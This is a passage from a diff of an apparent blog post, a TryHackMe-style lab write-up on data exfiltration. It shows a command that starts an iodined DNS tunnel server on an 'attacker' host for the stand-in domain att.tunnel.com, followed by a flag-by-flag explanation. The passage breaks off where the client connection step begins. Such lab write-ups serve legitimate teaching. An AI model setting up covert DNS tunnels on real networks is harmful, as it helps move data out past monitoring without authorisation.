CSpanias/cspanias.github.io/_posts/2023-10-20-Data Exfiltration.md

     # intiate the iodined server from Attacker
     thm@attacker:~$ sudo iodined -f -c -P thmpass 10.1.1.1/24 att.tunnel.com
     ```

+    Breaking down the command:
+    1. `iodined` The command-line utility used for setting up a DNS tunnel.
+    2. `-f` Foregrounds the command.
+    3. `-c` Disables checking the client IP address on all incoming requests.
+    4. `-P thmpass` Sets a pre-shared password for authentication and encryption.
+    5. `10.1.1.1/24` The IP address and subnet mask in CIDR notation, specifying the range of IP addresses that can be tunneled through DNS.
+In this case, it indicates the IP range from `10.1.1.1` to `10.1.1.255`.
+    6. `att.tunnel.com` The DNS server where the DNS tunnel will be established.

 2. Next, we need to connect to the server-side application from Jumpbox: